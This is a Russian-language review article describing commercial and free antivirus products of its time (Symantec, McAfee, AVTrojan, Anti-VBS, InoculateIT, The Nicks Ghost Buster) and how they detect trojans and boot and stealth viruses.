http://www.symantec.com Symantec AntiVirus™ – полнофункциональное антивирусное решение, обеспечивающее многоуровневую защиту корпоративного класса для шлюзов Интернета и почтовых шлюзов, серверов и рабочих станций. Благодаря сочетанию получившей признание пользователей антивирусной технологии и глобальной инфраструктуры поддержки корпорации Symantec эти программы обеспечивают надежную защиту. Использованные в этих пакетах эффективные технологии и поддержка защиты сети на всех уровнях устраняют необходимость в создании системы обеспечения безопасности из разрозненных продуктов, выпущенных различными поставщиками.
Центральная консоль управления Symantec System Center™ позволяет системным администраторам развертывать антивирусные решения, а затем создавать, принудительно проводить и обновлять политики, обеспечивающие правильную постоянную настройку серверов и рабочих станций, в масштабе всего предприятия и на различных платформах.
Продукты пакета, предназначенные для работы в шлюзах, обеспечивают быстродействующую масштабируемую защиту, предотвращающую проникновение вирусов в защищаемую сеть. Развитые средства автоматизации уменьшают объем администрирования, обеспечивают организациям улучшенную защиту и сокращают время
отклика. Технология Digital Immune System™, примененная в пакетах Symantec AntiVirus,
позволяет автоматически выполнять поиск, обнаружение и изоляцию новых вирусов, обеспечивая быстродействующую, надежную и не требующую вмешательства оператора защиту. Кроме того, уникальная многоуровневая технология NAVEX™, разработанная корпорацией Symantec, обеспечивает обновление описаний вирусов и модулей расширения без повторного развертывания программ и перезагрузки системы, благодаря чему увеличивается время бесперебойной работы системы и сокращается совокупная стоимость владения. Для повышения быстродействия и улучшения безопасности в новой
версии уменьшен объем файлов описаний вирусов, а также включена возможность многопоточного серверного развертывания. Пакеты Symantec AntiVirus™, как и
другие продукты корпорации Symantec, предназначенные для обеспечения безопасности,
поддерживается службой Symantec™ Security Response, ведущей организацией, занимающейся исследованиями и предоставлением технической помощи в области обеспечения безопасности при работе с Интернетом.
Семейство McAfee Security:

http://www.mccafee.com Семейство McAfee Security – предназначено для комплексной антивирусной защиты любого уровня: от карманного и персонального компьютера до распределенной корпоративной сети. Пользователи антивирусных продуктов McAfee – более 70 миллионов человек по всему миру. Кроме того, антивирусная защита McAfee является корпоративным стандартом для 80% компаний, входящих в “Fortune 100″ (100 ведущих мировых компаний). Продукты McAfee Security обеспечивают полную защиту для всех распространенных операционных систем и приложений, обнаруживая и корректно удаляя более 60 тысяч вирусов и враждебных программ. Помимо традиционной антивирусной защиты McAfee Security предлагает первое на рынке средство превентивной
защиты от вирусов – ThreatScan, а также брандмауэр и систему обнаружения вторжений
на уровне рабочих станций – McAfee Desktop Firewall. Полная защита от вирусов
Антивирусы McAfee обеспечивают высочайший уровень защиты, неоднократно подтвержденный сертификатами ICSA, Checkmark Level 2, VirusBulletin 100%
Detection и многочисленными независимыми тестами. Обнаруживаются и удаляются все типы вирусов и троянских программ, враждебные объекты Java/ActiveX, блокируется доступ к опасным WEB-ресурсам. Обнаружение более 60000 вирусов Антивирусный механизм Olympus, разработанный на базе передовых технологий McAfee и Dr. Solomon обнаруживает более 60 000 вирусов и враждебных программ, обеспечивая самый высокий на рынке показатель восстановления поврежденных файлов. Полномасштабная защита всех ОС McAfee Security охватывает все операционные системы и групповые приложения, используемые в современных корпоративных сетях: клиентские ОС Windows 95 / 98 / ME / NT Workstation / 2000 Professional / XP Home & Professional, DOS, Macintosh.
Cерверные ОС Windows NT Server, Windows 2000 Server / Advanced Server / Datacenter, Novell Netware 4.11 / 4.2 / 5.0 / 5.1 / 6.0, FreeBSD, Linux, HP-UX, AIX, SCO, Solaris. Групповые приложения MS Exchange 5.5/2000 и Lotus Notes/Domino. Интернет – шлюзы Windows NT/2000 и Sun Solaris; сетевые устройства хранения данных NetApp; ОС микрокомпьютеров (PDA) Palm OS, Windows CE / Pocket PC, EPOC (Psion). Превентивная защита сети от вирусов. Не имеющий аналогов на рынке продукт ThreatScan позволяет применять профилактические меры для защиты сети от потерь, связанных с вирусными эпидемиями, посредством регулярных проверок сети на предмет уязвимостей без необходимости привлечения экспертов по безопасности. ThreatScan обнаруживает незащищенные, неуправляемые, зараженные или уязвимые машины сети. Использование ThreatScan позволяет перейти от схемы реагирования на возникшие вирусные эпидемии к схеме предотвращения эпидемий, что избавляет от соответствующих затрат на устранение последствий деятельности вирусов.
Бесплатные антивирусы:
AVTrojan и Anti-VBS http://www.trojan.ru
Эти две простые программы написаны Игорем Суменковым. AVTrojan представляет собой программу, призванную бороться с таким подвидом вредоносных программ, как “троянские кони”. Для тех, кто не знает, могу сообщить: это программы, которые рекламируется как нечто полезное, но на самом деле не выполняют такого предназначения или, помимо полезных действий, совершают противозаконные действия в руках злоумышленников. Окно, появляющееся при запуске Anti-VBS, сразу раскрывает все возможности программы. Программа AVTrojan весьма проста, но эффективна. Она позволяет проверить: память, реестр, папки или отдельные файлы как вместе, так и по отдельности. Все функции доступны из панели инструментов продукта или, как обычно, через меню. Настройки программы минимальны, и самыми полезными из них, на мой взгляд, являются запуск одновременно с Windows и непонятно как попавшее сюда охлаждение процессора. Стоит отметить, что в отличие от обычных антивирусов AVTrojan является специализированным средством, созданным только для уничтожения “троянских” программ, поэтому и методы немного отличаются от обычных. Если пользователь запросил удаление “троянской” программы, обычный антивирус пытается удалить соответствующий ей файл на диске. Однако если данная “троянская” программа уже запущена, то ликвидировать такой файл нельзя, потому что он занят Windows. Результат – сообщение “Невозможно удалить вирус”, и начинающий пользователь ничего не сможет сделать. AVTrojan же удаляет любую обнаруженную “троянскую” программу в любом состоянии. Если она уже запущена, то принудительно закрываются все процессы в памяти, соответствующие данной программе, и после этого файл корректно удаляется.
Вторая программа, Anti-VBS, имеет весьма узкую специализацию и предназначена для поиска и уничтожения вируса I love you, а также всех его модификаций. В принципе возможно обнаружение и других VBS (Visual Basic Script) вирусов. Никаких настроек и премудростей у программы нет. Галочка “Лечить зараженные файлы” и кнопки “Старт” и “Выход”.
InoculateIT Personal Edition http://antivirus.cai.com
Эта программа компании Computer Associates International представляет собой мощный антивирусный комплекс, способный защитить компьютер от любых типов вирусов. Для получения программы надо зарегистрироваться на сайте разработчика. Данный антивирус работает под управлением Windows. Защита осуществляется в реальном времени, необходимый программный модуль загружается одновременно с Windows. Кроме того, вы всегда можете проверить жесткие и гибкие диски на предмет вирусов и других вредоносных программ. Антивирус построен наподобие Проводника, так что вы без проблем можете проверить как отдельные файлы, так и вызывающие у вас подозрения папки. Программа ведет подробную статистику, которая записывается в файл прямо с самого начала работы, отображая все данные в нижнем окне. Кроме того, InoculateIT способен проверять содержимое основных типов архивных файлов, что ставит его в один
ряд с самими современными антивирусами. Программа предусматривает создание шаблонов для проверки по всем дискам, возможность их сохранения и даже создания специальной дискеты для этого. Также данный антивирус защищается паролем, что будет полезно системным администраторам. Опции InoculateIT, касающиеся операций с макровирусами. InoculateIT поддерживает автоматическое обновление баз по вирусам и
поставляется вместе с энциклопедией этих вредных программ, где довольно подробно описаны их основные виды и особенности. Также неплохой Help. Содержит словарь основных терминов, но, как я уже говорил, все на английском языке, так что пользователям, плохо его знающим, от наличия этого словаря легче не станет. Работает программа весьма шустро и в целом оставляет после себя хорошее впечатление.
The Nicks Ghost Buster http://members.tripod.com/~NGBuster
Данная программа российского производства является ревизором диска, работающим в среде Windows 9х и NT. По функциональным возможностям Ghost Buster является конкурентом популярной программы ADinf. Но отличается от последней тем, что работает под управлением Windows. Со всеми вытекающими отсюда последствиями. Такими, как: графический интерфейс (GUI), многозадачная работа, многопоточность, истинная 32-разрядность. Самый главный плюс, по словам автора, в том что, можно обращаться напрямую к дискам (практически любым, не только физическим) через драйвер IOS (Супервизор ввода-вывода или драйвер 32-бит доступа к диску) в обход DOS-резидентов (в частности, Boot-вирусов, перехвативших 13h прерывание при загрузке компьютера), что не под силу DOS-программам. Понятно, что справедливо это только при работе в Windows9x. Основное окно программы The Nicks Ghost Buster заставляет вас вспомнить всем знакомый сериал о четверке охотников за привидениями. The Nicks Ghost Buster запоминает и при каждом запуске проверяет информацию об операционной системе и установленном аппаратном обеспечении – объем оперативной памяти DOS (изменения которой бывают при заражении большинством загрузочных вирусов), количество установленных винчестеров, таблицы параметров винчестера (Hard Disk Parameter Table). При всех этих проверках программа просматривает диск по секторам, обращаясь непосредственно в IOS, и не использует прерывания Int 21h и Int 13h, что
позволяет успешно обнаруживать активные маскирующиеся вирусы (Stealth-вирусы).
Действует программа следующим образом: при первом запуске она запоминает объем оперативной памяти DOS, адрес обработчика INT 13h, таблицы параметров диска и создает таблицы для проверяемых дисков. Потом антивирус проверяет диски в следующей последовательности: Проверяется объем оперативной памяти, доступной DOS, и таблица параметров жесткого диска (HDPT). Проверяются Master-Boot и Boot-секторы. Если найдены их изменения, то сравниваются текущие системные таблицы с теми, которые были ранее, и по желанию можно восстановить прежний сектор. Сектор
Master-Boot анализируется при проверке всех логических дисков. Проверяется список номеров сбойных кластеров, так как некоторые вирусы помечают хороший кластер как сбойный и используют этот кластер для размещения в нем своего кода и данных.
Проверяется дерево каталогов диска. Ищутся новые и удаленные каталоги. Проверяются файлы. Ищутся новые, удаленные, переименованные, перемещенные из одного каталога в другой и измененные файлы. Проверяется изменение длины даты и времени создания
файла и контрольной суммы файла. В завершение изменения анализируются, и если они, по мнению антивируса, “безобидны”, т. е. не похожи на проявления вируса, то программа просто представит вам всю информацию об изменениях. Если же происходят “подозрительные” изменения (похожие на проявления вируса), то NGB предупредит вас о возможности заражения. Интерфейс программы весьма прост и нагляден. Есть у The Nicks Ghost Buster одно неудобство – нельзя проверить определенный каталог на диске. Диск всегда проверяется только целиком, по разделам. Вообще же продукт производит приятное впечатление, и его можно смело рекомендовать если не к ежедневному применению, то по крайней мере к знакомству.
В завершении хочу сказать лишь одно, самый сильный антивирус это ваше благоразумие!!!

При создании статьи была использована информация с сайтов: http://www.submarine.ru http://www.avp.ru http://www.symantec.com , а так же других разработчиков программ представленных выше. В публикации был использован фрагмент книги Юлия Кима “Всё о вирусах”.

Роман Карпач